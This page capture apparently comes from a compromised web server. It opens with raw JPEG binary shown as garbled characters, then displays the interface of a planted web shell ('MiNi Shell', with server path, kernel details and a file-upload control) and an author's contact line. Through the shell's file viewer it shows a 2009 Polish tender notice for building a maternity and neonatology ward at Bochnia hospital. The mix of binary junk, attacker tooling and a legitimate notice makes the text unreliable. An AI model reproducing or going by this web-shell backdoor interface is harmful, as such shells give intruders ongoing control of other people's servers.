JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090105/2517-N-2009.html

<p class="kh_header"><b>Bochnia: Wykonanie dokumentacji projektowej oraz budowa Oddziału Ginekologii, Położnictwa i Bloku Porodowego oraz Neonatologii, w  ramach projektu: Pełne dostosowanie Oddziałów Ginekologii, Położnictwa i Neonatologii Szpitala Powiatowego w Bochni do wymogów prawa i szczególnych potrzeb pacjentów</b><br>
<b>Numer ogłoszenia: 2517 - 2009; data zamieszczenia: 05.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" , Ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 014 6153201, 6153233, 50979196, faks 014 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej oraz budowa Oddziału Ginekologii, Położnictwa i Bloku Porodowego oraz Neonatologii, w  ramach projektu: Pełne dostosowanie Oddziałów Ginekologii, Położnictwa i Neonatologii Szpitala Powiatowego w Bochni do wymogów prawa i szczególnych potrzeb pacjentów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: zaprojektowanie, uzyskanie ostatecznej decyzji zmiany pozwolenia na budowę na podstawie art. 36a ustawy Prawo budowlane, wybudowanie oraz uzyskanie pozwolenia na użytkowanie budynku P Szpitala Powiatowego w Bochni wraz ze wszystkimi obiektami towarzyszącymi, niezbędnymi do realizacji tego zadania tj.: przewiązką, sieciami uzbrojenia terenu, przyłączami, elementami zagospodarowania terenu, i innymi. Zamówienie nie obejmuje II etapu inwestycji, obejmującego nowy wjazd od ulicy Windakiewicza wraz parkingiem, drogą dojazdową, urządzeniem terenów zielonych oraz innymi elementami zagospodarowania terenu.
2. W skład przedmiotu zamówienia, o którym mowa w ust. 1 wchodzi:
1) wykonanie dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót (STWiO), o których mowa w art. 31 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, zgodnie z przepisami Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. nr 202 poz. 2072, ze zm.), dla budowy Oddziału Ginekologii, Położnictwa i Bloku Porodowego oraz Neonatologii.
2) uzyskanie wymaganych opinii, uzgodnień i zatwierdzeń dokumentacji projektowej wymaganych przepisami prawa, w tym uzgodnienia z Zamawiającym,  rzeczoznawcami p.poż., sanit-hig., bhp, ochroną środowiska, i inne wymagane dla uzyskania zmiany pozwolenia na budowę, odbioru robót oraz pozwolenia na użytkowanie, wykonanie ekspertyzy geotechnicznej i dokumentacji geologiczno - inżynierskiej dla terenu inwestycji,
3) zapewnienie nadzoru autorskiego autora projektu w zakresie, o którym mowa w Ustawie z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2006 r. nr 156, poz. 1118, z późn. zm.), 
4) opracowanie projektu ochrony przeciwpożarowej uzgodnionego z rzeczoznawcą ds. zabezpieczeń pożarowych obejmującego wszystkie obiekty i urządzenia przeciwpożarowe szpitala - dla budynku P,
5) wykonanie robót budowlanych - wg dokumentacji projektowej i STWiO, zgodnie 
z wytycznymi określonymi w programie funkcjonalno-użytkowym (załącznik nr 6 do SIWZ) oraz i projektem budowlanym i pozwoleniem na budowę: 
a) roboty budowlane w istniejących obiektach i budynkach szpitala,
b) roboty związane z zagospodarowaniem i uzbrojeniem terenu,
6) wykonanie Planu Bezpieczeństwa i Ochrony Zdrowia,
7) wykonanie plansz zbiorczych urządzeń podziemnych,
8) wykonanie dokumentacji powykonawczej,
9) zorganizowanie i przeprowadzenie niezbędnych prób, badań, odbiorów,
10) opracowanie wymaganych instrukcji obsługi i eksploatacji, łącznie ze szkoleniem Zamawiającego,
11) sporządzenie w imieniu Zamawiającego wniosku w sprawie zmiany pozwolenia na budowę oraz uzyskanie ostatecznej decyzji o pozwoleniu na budowę,
12) sporządzenie w imieniu Zamawiającego zawiadomienia o zakończeniu budowy i uzyskanie ostatecznej decyzji o pozwoleniu na użytkowanie oraz innych pozwoleń wymaganych przepisami prawa niezbędnych dla wykonania obiektu budowlanego i oddania go do użytkowania.
13) ustalenie w formie świadectwa charakterystyki energetycznej, jego charakterystyki energetycznej, określającej wielkość energii wyrażoną w kWh/m2/rok niezbędnej do zaspokojenia różnych potrzeb związanych z użytkowaniem budynku z zastrzeżeniem przepisów wskazanych w Prawie Budowlanym (tj. Dz. U. z 2006 r. nr 156, poz. 1118,z późn. zm.),
3. Projekty wykonawcze będą zawierały rysunki w skali uwzględniającej specyfikę zamawianych robót i zastosowanych skal rysunków w projekcie budowlanym wraz z wyjaśnieniami opisowymi, dotyczącymi:
1) części obiektu,
2) rozwiązań budowlano-konstrukcyjnych i materiałowych,
3) detali architektonicznych oraz urządzeń budowlanych,
4) instalacji i wyposażenia technicznego,
- których odzwierciedlenie na rysunkach projektu budowlanego nie będzie wystarczające dla potrzeb, o których mowa w ust. 2 pkt 2.
4. Specyfikacje techniczne wykonania i odbioru robót budowlanych będą zawierały: zbiory wymagań niezbędnych dla określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót i będą zawierać: specyfikacje techniczne wykonania i odbioru robót podstawowych, rodzaje robót według przyjętej systematyki lub grup robót. Ponadto należy je opracować z uwzględnieniem podziału szczegółowego według Wspólnego Słownika Zamówień.
5. Dokumentację projektową oraz STWiO należy opracować z uwzględnieniem konieczności uzyskania zmiany pozwolenia na budowę, dla etapów umożliwiających odbiory poszczególnych obiektów w miarę ich realizacji. 
6. Szczegółowe wymagania dotyczące zakresu i zawartości dokumentacji projektowej oraz robót budowlanych zawiera program funkcjonalno-użytkowy a także wzór umowy stanowiące integralną część SIWZ - załączniki nr 5, 6 oraz przepisy Ustawy Prawo Budowlane..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.40.00.00-1, 45.50.00.00-2, 45.31.00.00-3, 45.32.00.00-6, 45.33.00.00-9, 45.34.00.00-8, 45.23.32.00-1, 45.13.33.00-2, 45.11.12.91-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 300.000,00 zł (słownie: trzysta tysięcy złotych 00/100)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. W przetargu mogą wziąć udział wykonawcy, którzy:
1) nie podlegają wykluczeniu z postępowania na mocy art. 24 ustawy,
2) wykonali co najmniej 2 roboty budowlane polegające na budowie obiektów użyteczności publicznej, tj. budynków w Dziale 12 Polskiej Klasyfikacji Obiektów Budowlanych (PKOB), o wartości każdej z robót co najmniej 20.000.000,00 złotych brutto,
3) zapewnią udział w opracowaniu dokumentacji projektowej osób posiadających uprawnienia budowlane do projektowania bez ograniczeń i sprawdzania projektów architektoniczno-budowlanych w specjalności:
a) architektonicznej, z doświadczeniem w projektowaniu obiektów szpitalnych (tj. obiektów w klasie 1264 Polskiej Klasyfikacji Obiektów Budowlanych,
b) konstrukcyjno-budowlanej,
c) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, z doświadczeniem w projektowaniu instalacji w obiektach szpitalnych,
d) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
e) teletechnicznej;
4) zapewnią objęcie kierownictwa budowy przez osobę/osoby posiadające uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, z doświadczeniem w kierowaniu budową obiektu w klasie 1264 Polskiej Klasyfikacji Obiektów Budowlanych i o wartości co najmniej 7.000.000,00 zł brutto,
5) zapewnią objęcie kierownictwa robót w pozostałych branżach przez osobę/osoby posiadające uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych 
i kanalizacyjnych, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, teletechnicznej.
6) posiadają środki finansowe lub zdolność kredytową w wysokości minimum 2.000.000,00 złotych.
II. Ocena spełniania warunków udziału w postępowaniu:
1. Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie dokumentów przedłożonych przez wykonawcę wraz z ofertą, wyszczególnionych  poniżej w ogłoszeniu w pkt III.2) ust. III, na zasadzie kwalifikacji spełnia/nie spełnia.
2. W przypadku wykonawców występujących wspólnie warunki określone  w pkt III.2) ust. I pkt 1 ogłoszenia musi spełnić każdy z wykonawców (dokumenty wskazane w  pkt III. 2) ust. III pkt.1-5 ogłoszenia składa każdy z wykonawców występujących wspólnie we własnym imieniu), warunki wskazane w pkt III. 2) ust. I  pkt. 2-6 ogłoszenia mogą być spełnione łącznie.
3. Warunek doświadczenia osób uczestniczących w realizacji zamówienia, opisany  w pkt III.2) ust. I pkt3 lit. a i lit. c oraz w pkt III. 2) ust. I pkt 4  przedmiotowego ogłoszenia będzie uznany za spełniony jeżeli informacja o doświadczeniu projektanta i kierownika budowy zawarta w wykazie stanowiącym załącznik nr 4 do SIWZ, będzie poświadczać, że odpowiednio wykonali oni 1 projekt budowlany dla obiektu szpitalnego oraz kierowali przynajmniej 1 budową obiektu użyteczności publicznej. W wykazie należy w tym miejscu wskazać konkretne realizacje..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> III. Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć  wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.
1. W celu potwierdzenia, że wykonawca nie podlega wykluczeniu z postępowania na mocy art. 24 ustawy składa on wraz z ofertą następujące dokumenty:
1) oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu- według wzoru na załączniku nr 2 do SIWZ,
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3) aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy (dla podmiotów zbiorowych) wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie 
w projektowaniu oraz wykonywaniu robót budowlanych, składa on wraz z ofertą następujące dokumenty:
1) wykaz wykonanych w okresie ostatnich pięciu lat, przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych - określonych  w pkt III.2) ust. I pkt. 2 ogłoszenia, z podaniem ich przedmiotu, wartości, daty i miejsca wykonania, według wzoru na załączniku nr 3 do SIWZ, z załączeniem dokumentów potwierdzających, że zostały one wykonane należycie.
3. W celu potwierdzenia, że wykonawca spełnia warunki dysponowania osobami zdolnymi do wykonania zamówienia, opisane w pkt III. 2) ust. I  pkt.  3-5 ogłoszenia, składa on wraz z ofertą następujące dokumenty:
3.1 ) wykaz osób, o których mowa  w pkt III.2) ust. I  pkt. 3-5 ogłoszenia którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych czynności - według wzoru na załączniku nr 4 do SIWZ,
3.2) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych niezbędnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w pkt 3.1 powyżej  Wykonawca wskazał osoby którymi będzie dysponował,
3.3 ) decyzję o nadaniu uprawnień budowlanych do projektowania bez ograniczeń 
i sprawdzania projektów architektoniczno-budowlanych oraz zaświadczenia o wpisie na listę członków izby samorządu inżynierów budownictwa, dla wszystkich osób oraz we wszystkich specjalnościach, o których mowa w pkt III.2) ust. I  pkt. 3 ogłoszenia,
3.4) decyzję o nadaniu uprawnień do kierowania robotami w specjalności budowlano- konstrukcyjnej bez ograniczeń, lub decyzję o stwierdzeniu przygotowania zawodowego upoważniającą do wykonywania samodzielnej funkcji kierownika budowy oraz zaświadczenie o wpisie na listę członków izby samorządu inżynierów budownictwa, dla kierownika budowy, o którym mowa  w pkt III.2) ust. I  pkt.  4 ogłoszenia,
3.5) decyzje o nadaniu uprawnień do kierowania robotami bez ograniczeń, lub decyzję 
o stwierdzeniu przygotowania zawodowego upoważniającą do wykonywania samodzielnej funkcji kierownika budowy oraz zaświadczenie o wpisie na listę członków izby samorządu inżynierów budownictwa, dla kierowników robót w specjalnościach, o których mowa w pkt III.2) ust. I pkt. 5 ogłoszenia,
4. W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (warunek opisany w pkt III.2) ust. I  pkt. 6 ogłoszenia), składa on wraz z ofertą informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Informacja ta powinna zaświadczać, że jej wystawca: bank lub SKO-K, prowadzi rachunek wykonawcy oraz, że wykonawca posiada środki finansowe lub zdolność kredytową w wysokości minimum 2.000.000,00 złotych.
5. Dokumenty składane przez wykonawców zagranicznych.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej:
1) zamiast dokumentów, o których mowa  w pkt III.2) ust. III pkt. 2), 3) i 5) ogłoszenia składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2) zamiast dokumentów, o których mowa w pkt III.2) ust.III pkt 4) ogłoszenia - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
6. Dokumenty, o których mowa w ust. 5 pkt 1 lit. a i c oraz pkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ust. 5 pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
7. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 5, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Do aktualności tego dokumentu mają odpowiednie zastosowanie zapisy ust. 6.
8. Dokumenty potwierdzające, że zamówienia zostały wykonane należycie powinny pozwalać na jednoznaczne zidentyfikowanie ich z realizacjami wskazanymi przez wykonawcę w wykazie/ wykazach, o których mowa w ust. 2 (powinny odnosić się do konkretnych zamówień wskazanych w wykazie/wykazach). Wskazane jest, aby dokumenty te zawierały przynajmniej: nazwę i adres wystawcy dokumentu, nazwę zamówienia ze wskazaniem rodzaju prac/robót, datę odbioru (dzień, miesiąc, rok), wartość prac, oświadczenie o należytym wykonaniu zamówienia.
9. Dokumenty sporządzone w języku obcym będą składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
10. Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu wskazane w ust. 1 pkt. 2-5, ust. 2-5 i ust. 7 będą składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy, 32-700 Bochnia, ul. Krakowska 31, Dział Zaopatrzenia i Zamówień Publicznych, pok nr 9.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy, 32-700 Bochnia, ul. Krakowska 31, Sekretariat, pok nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com